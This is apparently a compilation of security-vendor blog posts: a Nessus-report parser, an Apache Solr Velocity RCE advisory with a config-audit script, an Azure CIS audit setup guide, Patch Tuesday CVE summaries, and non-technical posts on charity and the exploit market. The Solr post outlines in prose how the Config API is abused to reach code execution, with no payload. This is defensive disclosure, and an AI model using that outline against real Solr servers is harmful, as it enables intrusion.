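    return [(f["cvss"], f["host"], f["name"]) for f in scored[:limit]]


def windows7_hosts(findings):
    """Hosts whose OS Identification output names Windows 7 (support ends 14 Jan 2020)."""
    return sorted({f["host"] for f in findings
                   if f["plugin_id"] == OS_IDENTIFICATION_PLUGIN and "Windows 7" in f["output"]})


SAMPLE_NESSUS = """<NessusClientData_v2>
 <Report name="constructed">
  <ReportHost name="10.0.0.5">
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
               pluginID="11936" pluginName="OS Identification" pluginFamily="General">
    <plugin_output>Remote operating system : Microsoft Windows 7 Professional</plugin_output>
   </ReportItem>
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
               pluginID="90001" pluginName="Constructed SMB finding" pluginFamily="Windows">
    <cvss_base_score>9.3</cvss_base_score>
    <cve>CVE-0000-0000</cve>
   </ReportItem>
  </ReportHost>
  <ReportHost name="10.0.0.9">
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
               pluginID="11936" pluginName="OS Identification" pluginFamily="General">
    <plugin_output>Remote operating system : Linux Kernel 4.15</plugin_output>
   </ReportItem>
   <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="2"
               pluginID="90002" pluginName="Constructed SSH finding" pluginFamily="Misc.">
    <cvss_base_score>5.0</cvss_base_score>
   </ReportItem>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""

if __name__ == "__main__":
    fs = parse_nessus(SAMPLE_NESSUS)
    print("per host:", {h: dict(c) for h, c in severity_by_host(fs).items()})
    print("top:", top_findings(fs))
    print("Windows 7 hosts:", windows7_hosts(fs))
```

The severity attribute is Nessus's own banding, which is what the default report uses; sorting on cvss_base_score separately lets the tester rank by the numeric score when the two disagree. Point `parse_nessus` at the contents of a real export (the "Nessus" export format in Nessus Professional) to get the same summaries for an engagement.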

Get more information

Find out how Nessus Professional can help with penetration testing.

Start your free trial now

Apache Solr Vulnerable to Remote Code Execution Zero-Day Vulnerability


Apache Solr remains vulnerable to a zero day weeks after proof-of-concept code became public.

Background

On October 29, a proof of concept (PoC) for a remote code execution (RCE) vulnerability in Apache Solr, a popular open-source search platform built on Apache Lucene, was published as a GitHub Gist. At the time this blog was published, this vulnerability did not have a CVE identifier and no confirmation or indication of a solution available from Apache. Tenable Research has confirmed that Apache Solr versions 7.7.2 through 8.3 (the most current release) are vulnerable, and we suspect older versions that include the Config API are potentially vulnerable.

Analysis

According to the PoC, an attacker could target a vulnerable Apache Solr instance by first identifying a list of Solr core names. Once the core names have been identified, an attacker can send a specially crafted HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response Writer in the solrconfig.xml file to true.

(Screenshot: solrconfig.xml)

Enabling this parameter would allow an attacker to use the velocity template parameter in a specially crafted Solr request, leading to RCE.


Despite the recent release of Apache Solr 8.3 that addresses a default configuration flaw that was reported back in July, it appears the Velocity template vulnerability still exists as a zero day.

Proof of concept

As mentioned previously, a PoC was published on October 29 as a GitHub Gist. Days later, an exploit script was published to a GitHub repository.

Solution

At the time this blog was published, no patch was available for this vulnerability. We will update this blog post once a patch is available. Until a patch is available, or if upgrading is not feasible, users can mitigate attacks leveraging this vulnerability by adding authentication to the Apache Solr instance. Also, review the VelocityResponseWriter class in the solrconfig.xml configuration file and ensure the params resource loader value is set to false.

(Screenshot: VelocityResponseWriter section of solrconfig.xml)

Be advised that unless the Config API is locked down, an attacker could modify the solrconfig.xml file.
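A small audit of the setting the solution paragraph points at, as an added example (not Apache's or Tenable's code): it walks a solrconfig.xml, finds every queryResponseWriter backed by solr.VelocityResponseWriter and reports those with the params resource loader turned on. The configs below are constructed; `solr.VelocityResponseWriter` and `params.resource.loader.enabled` are the names as they appear in Solr's own configuration (the post calls the latter the "params resource loader value"), and the assumption that an absent setting means false follows from the post's statement that the PoC has to toggle it to true.

```python
"""Audit a Solr solrconfig.xml for the Velocity Response Writer setting
described above. Added example, not Apache's or Tenable's code; the configs
are constructed. Assumes the parameter defaults to false when absent.
"""
import xml.etree.ElementTree as ET

VELOCITY_CLASS = "VelocityResponseWriter"
PARAMS_LOADER = "params.resource.loader.enabled"


def velocity_writers(xml_text):
    """Return [(writer name, params_loader_enabled)] for each Velocity writer.

    Only an explicit 'true' is reported as enabled; a missing <str> is
    treated as the false default.
    """
    root = ET.fromstring(xml_text)
    result = []
    for writer in root.iter("queryResponseWriter"):
        if VELOCITY_CLASS not in (writer.get("class") or ""):
            continue
        enabled = False
        for setting in writer.findall("str"):
            if setting.get("name") == PARAMS_LOADER:
                enabled = (setting.text or "").strip().lower() == "true"
        result.append((writer.get("name"), enabled))
    return result


def exposed_writers(xml_text):
    """Names of Velocity writers that accept templates from request parameters."""
    return [name for name, enabled in velocity_writers(xml_text) if enabled]


# Constructed: the state the Config API request in the PoC leaves behind.
UNSAFE_CONFIG = """<config>
  <queryResponseWriter name="velocity" class="solr.VelocityResponseWriter" startup="lazy">
    <str name="template.base.dir"></str>
    <str name="params.resource.loader.enabled">true</str>
  </queryResponseWriter>
  <queryResponseWriter name="json" class="solr.JSONResponseWriter"/>
</config>
"""

# Constructed: the setting the post recommends.
SAFE_CONFIG = UNSAFE_CONFIG.replace(">true<", ">false<")

if __name__ == "__main__":
    print("exposed writers:", exposed_writers(UNSAFE_CONFIG))
    print("exposed after fix:", exposed_writers(SAFE_CONFIG))
```

Because the post notes the Config API can rewrite this setting unless it is locked down, treat a "false" result as a point-in-time answer: the check is only meaningful once authentication is in front of the instance, and it is worth re-running on a schedule.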

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they’re released.


How to Audit Microsoft Azure with Tenable Solutions


Microsoft Azure is a cloud offering that provides infrastructure-as-a-service (IaaS), platform-as-a-service (PaaS) and software-as-a-service (SaaS) solutions. With the complexities associated with the cloud, auditing Azure architecture is challenging but vital to an organization’s cyber hygiene. Let's walk through how to audit Azure with Tenable.

Refactoring Microsoft Azure support to align with CIS guidance

Previously, compliance support in Tenable products was limited to the items and capabilities offered in the TNS Azure Best Practice audit files. Since those audit files were released, additional community guidance has come out, specifically guidance from the Center for Internet Security (CIS). To fully support the new CIS recommendations and incorporate feedback from customers using the TNS Azure Best Practice audits, we significantly refactored our Azure support in Tenable.io and Nessus.

Level 1 and Level 2 .audit files

This new CIS guidance offers users choices between Level 1 and Level 2 recommendations similar to its other benchmarks:

  • Level 1: Generally, these recommendations should provide good security benefits without affecting most uses of the platform. 
  • Level 2: These settings are more secure, but can affect usage and workflows. As always, we recommend reviewing and testing new configurations to identify any settings that impact your business processes.

An example recommendation found in the CIS benchmark is to ensure RDP or SSH access is restricted from the internet for virtual machines. Such a misconfiguration could be catastrophic for an organization if utilized as an attack vector. Auditing Azure with Tenable audits based on CIS guidance ensures these misconfigurations are found and can be remediated in a reliable and expedient manner.

New audits being released

These new audits are based on the most recent benchmark guidance from CIS and should be considered direct replacements for the existing best-practice audits:

  • CIS_Microsoft_Azure_Foundations_L1_v1.1.0.audit
  • CIS_Microsoft_Azure_Foundations_L2_v1.1.0.audit

Existing audits being retired

Due to the refactoring of the compliance plugin for Azure and the more extensive coverage of the CIS benchmark, the existing TNS Azure Best Practice audits are being retired:

  • TNS Microsoft Azure Best Practices Audit v1.0
  • TNS Microsoft Azure Database Best Practices Audit v1.0.0
  • TNS Microsoft Azure Websites Best Practices Audit v1.0.0

CIS Microsoft Azure Foundations Benchmark

The CIS Microsoft Azure Foundations benchmark is divided into multiple sections:

Identity and Access Management

Key recommendations include: 

  • Multi-factor authentication 
  • No guest users 
  • Users cannot register applications

Security Center

This section focuses on making sure key alert policies (e.g., ASC Default) are configured. 

Storage Accounts

Key recommendations include: 

  • Enabling “secure transfer required”
  • Setting default network access rule to “deny”

Database Services

Key recommendations include: 

  • "Auditing" is set to "On"
  • "Audit Retention" is set to greater than 90 days
  • "Threat Detection types" is set to "all"

Logging and Monitoring

A quality logging configuration is imperative to any secure IT environment. This section includes configuration checks to ensure: 

  • Logging for Azure Keyvault is enabled
  • Activity Log Retention is set to 365 days or greater 
  • Log Profiles exist

Networking

A secure networking configuration is vital in a cloud environment. Some examples of CIS recommendations in this section are:

  • RDP/SSH access is restricted from the Internet
  • Network Security Group flow log retention is set to greater than 90 days

Virtual Machine

Key recommendations include ensuring: 

  • Disks are encrypted 
  • Only approved extensions are installed

AppService

For Azure AppService, there are many recommendations to ensure the latest versions of the software are used and that authentication and redirects are securely configured.

Other Security Considerations

Other security considerations include:

  • Verifying expiration dates are set for keys and secrets 
  • Ensuring resource locks are used where appropriate

Check Overview

To audit appropriate configuration information as described in the CIS benchmark, Tenable has updated its Azure plugin with a list of new request types. An example check type using a new request type is here:

(Screenshot: Azure plugin check using a new request type)

How to audit Microsoft Azure Foundations with Tenable using the CIS benchmark

Auditing an Azure environment requires some extra steps. As part of our release of plugin enhancements and audit coverage for the CIS benchmarks, we have implemented a new key credential type to simplify scanning setup. 

At a high level, this involves: setting up an application registration in the Azure Active Directory (AD), ensuring it has proper API permissions, generating a secret key and providing the Tenable scan policy the appropriate client ID and key.

An example summary output for the CIS benchmarks

(Screenshot: example summary output for the CIS benchmark)

Below is a closer view of one of the results. This page shows:

  • Pass/Fail status
  • Remediation steps, if necessary
  • Individual results from the systems scanned
  • Reference information to cybersecurity frameworks

An example failing configuration check:

(Screenshot: example failing configuration check)

An example passing configuration check:

(Screenshot: example passing configuration check)

Summary

Auditing an Azure environment with Tenable.io and Nessus requires a little bit of extra setup compared to our standard compliance plugins but allows for a secure and automated method for evaluating your organization’s compliance. 

At Tenable, we regularly update our policy compliance audits to match the newest versions by CIS and the U.S. Defense Information Systems Agency (DISA) to ensure our customers can easily keep pace with the latest best practices.

Azure compliance scan setup

The Azure plugin will scan the Azure REST API and audit the environment's configuration.

Scan requirements

Credentials

The plugin requires one of two supported credential sets.

  • Password: This legacy credential set requires the username and password of a scan account created in Azure AD and the Application ID of a registered application.
  • Key: This credential set requires the Application ID and client secret of a registered application as well as the Tenant ID.

Azure environment setup

To use the legacy password-based authentication for your scan, follow these steps:

Create Azure AD user account

  1. Create a new user for scanning in Azure AD

Assign user the Reader role

  1. Click the Subscriptions Blade -> **Your Subscription** -> Access Control (IAM) -> Role Assignments -> (+ Add)
  2. Add the Reader role to the user account you previously created for scanning

Register application - password

  1. Click Azure Active Directory->App Registrations
  2. Click the New Registrations application
  3. Give the application a name, choose your supported account types for your environment and click the register button
  4. Click Authentication and choose Yes for Default Client Type/Treat application as a public client

Assign API permissions

  1. Click your registered application in Azure Active Directory -> App Registrations -> Your Application -> API Permissions
  2. Add the following API permissions and click Grant admin consent for:
    1. Azure Active Directory Graph -> Directory.Read.All
    2. Azure Active Directory Graph -> User.Read
    3. Azure Service Management -> user_impersonation

To use the Key-based authentication method for your scan, follow these steps:

Register application - key

  1. Click Azure Active Directory -> App Registrations
  2. Click the New Registrations Application
  3. Give the application a name, choose your supported account types for your environment and click the register button
  4. Choose Public Client/Native for the redirect URI type. Add a redirect URL and click Register

Create application client secret

  1. Click your registered application in Azure Active Directory -> App Registrations
  2. Click Certificates and Secrets
  3. Click + New Client Secret
  4. Give the secret a name and click Add
  5. Copy the secret somewhere safe for use in authenticating during a scan

Assign the application the Reader role

  1. Click the Subscriptions Blade -> **Your Subscription** -> Access Control (IAM) -> Role Assignments -> (+ Add)
  2. Add the 'Reader' role to the application you previously created for scanning

Assign API permissions

  1. Click your registered application in Azure Active Directory -> App Registrations -> Your Application -> API Permissions
  2. Add the following API permissions and click Grant admin consent for:
    1. Azure Active Directory Graph -> Directory.Read.All
    2. Azure Active Directory Graph -> User.Read
    3. Azure Service Management -> user_impersonation
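The key-based registration above, done from the Az PowerShell module instead of the portal, as an added example that is not Tenable's or Microsoft's code. It assumes Az.Resources 5.x or later (where New-AzADApplication takes -DisplayName and New-AzADAppCredential returns SecretText), a session already signed in with Connect-AzAccount, and an application name of your choosing; the three API permissions listed in the steps are still added and admin-consented in the portal, because the cmdlets for that differ between module versions.

```powershell
# Added example (not Tenable's or Microsoft's code): register the scanning
# application, assign Reader, and mint a short-lived client secret.
# Assumes Az.Resources 5.x+ and an existing Connect-AzAccount session.
param(
    [string]$AppName           = "tenable-cis-azure-scan",   # assumed name, change freely
    [string]$SubscriptionId    = (Get-AzContext).Subscription.Id,
    [int]   $SecretLifetimeDays = 180                          # keep the secret short-lived
)

# 1. Register the application and give it a service principal in the tenant.
$app = New-AzADApplication -DisplayName $AppName
New-AzADServicePrincipal -ApplicationId $app.AppId | Out-Null

# Directory replication can lag; a short pause avoids a spurious
# "principal not found" on the role assignment that follows.
Start-Sleep -Seconds 30

# 2. Least privilege: Reader on the subscription is all the audit needs.
New-AzRoleAssignment -ApplicationId $app.AppId `
                     -RoleDefinitionName "Reader" `
                     -Scope "/subscriptions/$SubscriptionId" | Out-Null

# 3. Client secret with an explicit expiry (the benchmark's own
#    "expiration dates are set for keys and secrets" recommendation applies here).
$cred = New-AzADAppCredential -ApplicationId $app.AppId `
                              -EndDate (Get-Date).AddDays($SecretLifetimeDays)

# 4. The three values the Tenable "Key" credential set asks for.
[pscustomobject]@{
    TenantId      = (Get-AzContext).Tenant.Id
    ApplicationId = $app.AppId
    ClientSecret  = $cred.SecretText   # shown once; store it in a vault, not in a script
}
```

After running it, complete the API permissions step in the portal (Azure Active Directory -> App Registrations -> your application -> API Permissions) and grant admin consent, then paste the tenant ID, application ID and secret into the scan's Key credential.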

Join Tenable's Audit and Compliance Research Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Giving Tuesday at Tenable: A Look at We Care → In Action


In the spirit of Giving Tuesday, we’re featuring the Multiple Sclerosis Foundation, Tenable’s We Care → In Action global cause for 2019. Here, our own Adrian Morgan, senior marketing operations manager, shares five lessons she learned while navigating the life-altering disease. 

“We Care” – these two compact words represent one of our company’s core values. Simple sentiment, right? But if you take them to heart, you can really make a difference.

This year, as part of our We Care → In Action initiative, we invited employees to submit nominations for charitable organization sponsorship. These were causes employees were already contributing to in some way. By selecting one organization, we could rally efforts together as one global community. Throughout 2019, Tenable employees have had opportunities to participate in a global care package drive for MS patients who struggle financially, make monetary donations and learn about MS through shared resources and even directly from a Multiple Sclerosis Foundation representative. 

In short, We Care → In Action is a way for employees to live our We Care core value. 

That’s why we’re excited to honor today’s GivingTuesday – “a day that encourages people to do good.”

“Whether it’s making someone smile, helping a neighbor or stranger out, showing up for an issue or people we care about, or giving some of what we have to those who need our help, every act of generosity counts and everyone has something to give.” – GivingTuesday.org

So, in the spirit of Giving Tuesday, we’re turning to one of Tenable’s own employees who recounts her experiences with MS, reminding us the inspiration to reach far out starts from deep within.

"Every person’s experience with Multiple Sclerosis (MS) is wildly different. I went from being the person who has a family member with MS to being the person with MS. It was April 2012. Work was crazy, home was crazy and I was stressed. It started with my head feeling like it was in the Iron Claw (wrestling fans should remember Fritz Von Erich), but I brushed it off as a migraine, despite never having migraines before. I finally called my primary care when the vision in my left eye was completely gone. He sent me straight to the eye doctor who dealt with emergencies. I was in a chair with a light directly in my eye, and I couldn’t see it. The doctor held the giant F at the top of the eye chart in front of my face, but I couldn’t see anything. The doctor started running tests. I got sent for IV steroids, which was supposed to help with inflammation – the only thing they could see – but they couldn’t figure out what was causing it.

Oh no! What did I do? I should have called the doctor sooner (don’t be like me, kids). After a few days of agonizingly slow waiting, results were finally in: the doctor suspected MS. I got sent to a neurologist for final results, who agreed and I started my treatment. I am 100% better now, but still have flares and will for the rest of my life.

Five lessons learned working with Multiple Sclerosis

Some things I learned while navigating this disease without letting it take over my life:

  1. Learn as much as you can about the disease. While people mean well, you will probably get a lot of misinformation. Become a master of your own journey.
  2. Be honest with your supervisor. You are going to need to bag out on work for doctor’s appointments fairly often in the beginning. While it is no one’s business what you are going through, being honest is best. You don’t want people assuming you are up to no good.
  3. Take notes (about everything!). You are going to be stressed and forget things. So, carry a notebook (or take notes on your phone). I filled up two notebooks in the first few months after dx – one for the doctors, one for work. 
  4. Take time for yourself. There is an immediate feeling of hopelessness, but don’t let it take you. Do something that makes you smile. 
  5. Finally, all hope is NOT gone. This disease comes with a lot of unknowns, but there is a lot of support out there for us. 

I have MS. MS doesn’t have me.

Adrian Morgan, senior marketing operations manager at Tenable, lives with Relapsing Remitting MS (RRMS)

Get involved

To participate in the MS community and/or share your experiences, visit: https://msfocus.org/

To learn more about MS, check out these videos recommended by Adrian:

Want to take part in GivingTuesday? Here are some easy ways to get started:

A Look at the Vulnerability-to-Exploit Supply Chain


Last week, Tenable Research released the report, How Lucrative Are Vulnerabilities? A Closer Look at the Economics of the Exploit Supply Chain, which takes a close look at the vulnerability-to-exploit supply chain and ecosystem.

The journey a software flaw takes – from being discovered and disclosed as a vulnerability to exploit development to ultimately being used in a cyberattack – includes many different travelers and stops. We chose to portray this journey in the form of a simplified vulnerability-to-exploit (V2E) supply chain model, which consists of only four main players:

  1. Producers: Discover vulnerabilities and then develop proof-of-concept exploit code. 
  2. Suppliers: Facilitate the brokering and general availability of exploits and related knowledge to the market. 
  3. Service providers: Integrate exploits into a variety of third-party products and services – from penetration testing frameworks to exploit kits. 
  4. Consumers (e.g., end-user organization conducting a penetration test, criminal gang perpetrating fraud): Use the exploits.

(Figure: The V2E simplified supply chain)

To learn more about the model and associated market actors, download the report. In this blog post, we’ll delve into one of the more interesting aspects of the V2E ecosystem.

Three markets of the vulnerability-to-exploit supply chain

While this supply chain model does a great job of breaking down the individual actors, it does hide a significant difference from most other markets. What makes the V2E supply chain so unique is it straddles three very different market segments: the white, gray and black markets. 

  • White market in vulnerabilities and exploits: Primarily composed of cybersecurity vendors and researchers focused on making intelligence widely available. It has driven the price of zero-day exploits into astronomical six-digit figures.
  • Gray market: Composed of nation states and state-sponsored agencies/actors, motivated by national security concerns, that acquire and develop exploits for covert intelligence operations.
  • Black (criminal) market: Exists mainly on the dark web. Black marketers sell capabilities required to weaponize and productize exploits in the form of cybercrime-as-a-service offerings (e.g., offensive operations such as ransomware).

Vulnerability-to-exploit supply chain: One ecosystem, conflicting goals 

These markets are symbiotic and share a single ecosystem, but their objectives are diametrically opposed. The white market seeks to “defend and disclose” while the black market aims to “attack and obfuscate.” Gray market participants carefully balance national security and public security, relying on the latter, but will disclose for the greater good. By the time an exploit moves from vulnerability discovery to being used in an attack, it will have jumped across at least two and sometimes all three of these markets.

(Figure: Supply chain flow, showing the journey through the white, gray and black V2E markets)

Vulnerability-to-exploit supply chain: Common start, differing or even parallel paths

Whichever of the three markets, the journey always begins with the discovery of a vulnerability, but then can take divergent and occasionally even parallel paths. The only difference is the white market uses the vulnerability and exploit intelligence to develop and deploy defensive capabilities, rather than pursue criminal objectives like the black market.

(Figure: Mirrored legal and illegal V2E supply chain)

Commercialization of the vulnerability-to-exploit supply chain

Both sides of the supply chain, whether defensive or offensive, diverge into commercial offerings. Research shows the black market has professionalized in recent years, with cybercrime-as-a-service offerings catering to a wide variety of criminal activities. Many of these are microservices bundled together to create purpose-designed attack architectures – from victim identification and profiling to persistence and attack obfuscation. Business-to-business services (e.g., money laundering, cryptocoin escrow services) complete an end-to-end ecosystem, making sophisticated offensive cyber capabilities available to anyone with sufficient will and capital. 

While the barriers to entry for developing and weaponizing exploits have risen due to this professionalization, the barriers to entry for conducting criminal and offensive cyberoperations, in terms of required skill and tooling, have been lowered. Criminals can buy whatever capabilities they require and focus on committing the crime. This may well lead to growth in cybercrime, but it also represents an Achilles heel for smart defenders to target.

Less diversity in vulnerabilities being targeted in the wild

This increase in professionalism has come at the cost of diversity: less diversity in threat actors and, especially, less diversity in their deployed tools, tactics and procedures. That all equates to less diversity in the vulnerabilities being targeted in the wild, which, for end users and the community with the right intelligence, means more strategic remediation and less work.

Why Security and Legal Need to Work Together


This three-part blog series explores the relationship between law and security, as it pertains to vulnerability management. In part one, we’ll look at how the changing field of cybersecurity requires legal and security teams to work together more closely than ever. 

Instead of merely being an issue for IT and security teams, cybersecurity has become a primary concern across the business – especially for the legal team. As the field of cybersecurity continues to evolve, legal and security teams will need to work together to create cohesive cybersecurity measures. 

The laws security teams need to know 

From Europe’s General Data Protection Regulation (GDPR) to its Californian counterpart, it’s inevitable that laws will affect the work of the security team. Determining which regulations apply is only the first step, as cybersecurity practitioners also need to decide how those regulations should be interpreted within their specific organization. A close working relationship between legal and security teams is imperative for organizations to maintain compliance and avoid hefty fines or reputational damage. 

Here are some critical components of current cybersecurity and data laws that your legal team can help explain to your security team: 

U.S. federal law

The U.S. has no overarching federal cybersecurity law. However, there may still be federal regulations that businesses must comply with. Government contractors have specific cybersecurity rules to follow. For example, the Department of Defense requires contractors to comply with set cybersecurity standards or risk losing their contract. There are also industry-specific federal laws to be aware of (e.g., HIPAA, GLBA). Depending on what industry your organization operates in, you may have specific regulations to follow. 

Questions to ask your legal team:

  • Are there industry-specific privacy or data regulations that our security measures must comply with? 
  • If so, what sort of protections and security measures will we need to put into place to both comply with federal law and prevent security breaches?
  • To maintain compliance, how can the legal and security teams work together to continuously monitor changes to existing laws and implementation of new laws?

State law

Cybersecurity and privacy laws can vary on a state-by-state basis. For example, in the instance of a data breach, different states have different requirements for data collection or notification timelines. Knowing the different regulations for each state could save your organization from fines or reputational risk. The National Conference of State Legislatures provides an overview of data security laws for each state. 

Some states are stricter than others when it comes to cybersecurity. New York, for example, has special laws in place to regulate the financial sector. The state of California has the most stringent information security regulations in place. The California Consumer Privacy Act (CCPA) gives consumers many rights, such as the right to know if their personal data is being collected and whether or not that data is sold. It also allows consumers to access their personal data. 

On January 1, 2020, California’s SB-327, its IoT security bill, takes effect, making it the first state with a law concerning IoT. The bill requires that internet-connected devices be equipped with “reasonable” security features. This piece of legislation is particularly powerful because vendors selling devices in other states as well as California must comply. 

Questions to ask your legal team: 

  • How should we be thinking about varying state laws when building security measures?
  • Are we operating in any states that may have stricter cybersecurity laws than others?
  • If one state has more stringent laws, what does that mean for our operations in other states? 

International law 

In 2018, the European Union (EU) implemented GDPR, which applies not only to EU businesses, but to any businesses that provide services to individuals in the EU or monitor the behavior of EU individuals. GDPR is a sweeping regulation intended to give individuals more control over their personal information. Businesses can be hit with heavy fines for non-compliance. 

Questions to ask your legal team: 

  • What aspects of GDPR affect our company’s security measures? 
  • If we were to collect personal information from individuals, how should we notify them – or do we need to obtain their consent before doing so?
  • Should we minimize the amount of data we process in order to comply? 

It’s a two-way street

For both parties to work cohesively, security teams need to work with the legal team to understand different laws that may impact a security policy. On the other hand, legal teams need to learn from the security teams how data is collected and used, and what technologies are being implemented. The legal team should understand not only how an organization uses its data, but how that data transfers throughout the organization. By understanding how data is used and transferred within an organization, the legal team is better equipped to understand the specific laws and regulations that apply in specific scenarios. 

When security and legal work together to take an interdisciplinary approach to cybersecurity measures, an organization is better poised to manage cyber risk in the modern era. 

Disclaimer: This post does not seek to give legal advice nor delve into the finer points of data protection legislation. Due to the complex nature of information security law, it is critical that legal and security teams work together to understand which laws apply to them and ensure they are engaging in industry best practices. The laws and regulations discussed above will provide a critical groundwork from which cybersecurity practitioners can build upon in order to create compliant security plans and understand their legal risk. 

3 Reasons Why Your Business Is Vulnerable to Cyber Threats


Today’s cyber landscape changes in the blink of an eye. It’s critical to understand why your business is vulnerable – so you can take the right steps to protect it.

According to Ponemon Institute’s report, Measuring & Managing the Cyber Risks to Business Operations, 91% of surveyed organizations have suffered cyberattacks in the past 24 months. And 60% have experienced two or more business-disrupting cyber events in that same time period.  

Based on Tenable Research’s Vulnerability Intelligence Report, the live population (22,625) of distinct vulnerabilities that actually reside in enterprise environments represents 23% of all possible CVEs (107,710). Knowing these numbers, it is essential to understand and track your organization’s security posture and cyber risk over time.

Let’s look at three reasons why vulnerability management is key and how it can help you properly assess your organization’s level of cyber risk.

1. We’ve entered a new era of cyber conflict

By understanding the evolution of cyber conflict, you’ll know the challenges you’re up against. The cybersecurity space continues to evolve, especially with the increasing ease of access to computer resources and knowledge. 

This has introduced a whole-new set of players to the dark side of the equation – players who have the secrecy, resources, funds and capabilities to exploit vulnerabilities. Furthermore, many businesses have failed to keep up with the changing environment, and poor cyber hygiene has left them vulnerable to attacks.  

According to the U.S. National Vulnerability Database (NVD), there was a 52% increase in the number of vulnerabilities discovered in 2017 compared to 2016, with an overall number of 15,038 vulnerabilities. This big jump indicates two key things: 

  • More people – whether security researchers, bug bounty participants or threat actors with malicious intent – are examining products and discovering vulnerabilities. 
  • Software quality is dropping. With more start-ups, the adoption of IoT and a faster speed of business, organizations started to shorten the testing and quality assurance process to go to market faster and capture the business first, then deal with the caveats later. (This needn’t be the case though. Check out our container security ebook to keep DevOps moving at the speed of business.)

2. Network structures continue to evolve

Understanding changing network structures is key to understanding how a business is vulnerable. Network evolution has multiple aspects: 

  • Network structure: The complexity of network architecture is growing due to increased virtualization (either through containers, automation, DevOps or software-defined network) and the emergence of prepackaged web applications. 
  • Network components: Today’s attack surface now includes smart devices and IoT, bring your own device (BYOD) flexibility, roaming users and cloud services.
  • IT and OT network security: Ownership of the two areas is merging.

In short, it is increasingly difficult to get a full picture of the network.

3. Security teams are overwhelmed 

At the end of the day, you may have hundreds or thousands of assets to protect on your network. The attacker may only need a single weak entry point. It may seem like an insurmountable challenge, but every solution has to start somewhere. 

There isn’t a single CISO or security leader who does not ask his/her team the following questions:

  • How secure - and exposed - are we?
  • What should we prioritize? 
  • How are we reducing exposure over time?
  • How do we compare to our peers? 

The answers to these questions are the primary driver for understanding where your business is vulnerable and beginning to make improvements. 

Getting back to cyber hygiene basics with vulnerability management

Considering the above variables and challenges, it is extremely rare to find a security leader who can confidently define their network boundaries. As a result, organizations often end up with a concerning number of blind spots in their networks. 

Going back to the cyber hygiene basics with vulnerability management and honestly evaluating the challenges you are facing is a key to understanding where your business is vulnerable. This will enable you to establish a functional process to measure your business’s overall risk and protect your network. 

The most basic fact is: you can’t protect what you can’t see. Acquiring tools, technologies, skills and services to confidently define the network boundaries, type and number of assets, applications and services should be the first priority for any security leader. It is the primary building block for an effective security program. Once you have complete visibility into your vulnerabilities, you can get into the race. 


Microsoft's December 2019 Patch Tuesday Includes Fix for Zero Day Exploited in the Wild (CVE-2019-1458)


Microsoft closes out 2019 by patching 36 CVEs, including one flaw that was exploited in the wild as a zero-day.

Microsoft sent administrators around the world an early holiday gift with a lighter-than-usual Patch Tuesday. The December 2019 Patch Tuesday contains updates for 36 CVEs, seven of which are rated as critical. This month’s updates include patches for Microsoft Windows, Microsoft Office, Internet Explorer, SQL Server, Visual Studio, and Skype for Business. The following is a breakdown of the most important CVEs from this month’s release.

CVE-2019-1458 | Win32k Elevation of Privilege Vulnerability

CVE-2019-1458 is a high-severity elevation of privilege vulnerability in Microsoft Windows that occurs when the Win32k component fails to properly handle objects in memory. An attacker who is able to log onto the system could execute a specially crafted application to exploit this flaw to run arbitrary code in kernel mode. Microsoft’s advisory notes this vulnerability has been exploited in the wild, and according to researchers Anton Ivanov and Alexey Kulaev of Kaspersky Lab it is connected to another zero-day exploit in Google Chrome that the researchers disclosed in November.

CVE-2019-1471 | Windows Hyper-V Remote Code Execution Vulnerability

CVE-2019-1471 is a sandbox escape code execution vulnerability caused by a malicious application on a virtual machine (VM) running on the targeted Hyper-V host. An attacker would either need to deploy a malicious application on an existing VM or deploy their own malicious VM on the target Hyper-V host. Once an attacker has that access, an attacker could exploit this vulnerability to cause the Hyper-V host to execute arbitrary code.

CVE-2019-1468 | Win32k Graphics Remote Code Execution Vulnerability

CVE-2019-1468 is a vulnerability within the Windows font library, which could lead to remote code execution if embedded fonts are handled incorrectly. An attacker could exploit this by creating a malicious document or webpage with this vulnerability embedded in it, requiring the victim to either visit the affected site or open the malicious document. Exploitation of this vulnerability could lead to the execution of arbitrary code on the victim's system.

CVE-2019-1387, CVE-2019-1349, CVE-2019-1350, CVE-2019-1352, CVE-2019-1354 | Git for Visual Studio Remote Code Execution Vulnerability

CVE-2019-1387, CVE-2019-1349, CVE-2019-1350, CVE-2019-1352 and CVE-2019-1354 are remote code execution vulnerabilities caused by unsanitized command line inputs in Git for Visual Studio. When exploited, an attacker could cause Visual Studio to execute code within the context of the current user account. These vulnerabilities are therefore limited by user access, so restricted user accounts would pose a lower risk than a compromised administrator account.

CVE-2019-1484 | Windows Object Linking and Embedding Remote Code Execution Vulnerability

CVE-2019-1484 is a vulnerability in Windows Object Linking and Embedding (OLE) that could lead to remote code execution if it fails to validate user input correctly. Exploitation of this vulnerability would require an attacker to create a malicious file and the victim to execute this file on their system, potentially leading to the execution of arbitrary code on their system.

CVE-2019-1462 | Microsoft PowerPoint Remote Code Execution Vulnerability

CVE-2019-1462 is a remote code execution vulnerability in Microsoft PowerPoint. This flaw occurs due to improper handling of objects in memory. Exploitation of this would require an attacker to convince a user to open a specially crafted file with an affected version of Microsoft PowerPoint, such as via a phishing campaign. Once the crafted file is opened, however, it could allow for arbitrary code to be run with the same privileges as the user who opens the file. Microsoft notes the Reading Pane is not an attack vector for this particular vulnerability.

CVE-2019-1485 | VBScript Remote Code Execution Vulnerability

CVE-2019-1485 is a remote code execution vulnerability due to how the VBScript engine handles objects in memory. When exploited, the vulnerability could corrupt memory in such a way that allows an attacker to execute arbitrary code. Microsoft rates this flaw as more likely to be exploited, and it would most likely be used in malware or phishing campaigns. To exploit this vulnerability, an attacker would need to entice a user to visit a specially crafted website with Internet Explorer or embed an ActiveX control in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

Tenable Solutions

Users can create scans that focus specifically on our Patch Tuesday plugins. From a new advanced scan, in the plugins tab, set an advanced filter of “Plugin Name” “Contains” “December 2019”.

Advanced Search filter

With that filter set, click the plugin families to the left, and enable each plugin that appears on the right side. Note: If your families on the left say Enabled, then all the plugins in that family are set. Disable the whole family before selecting the individual plugins for this scan. Here’s an example from Tenable.io:

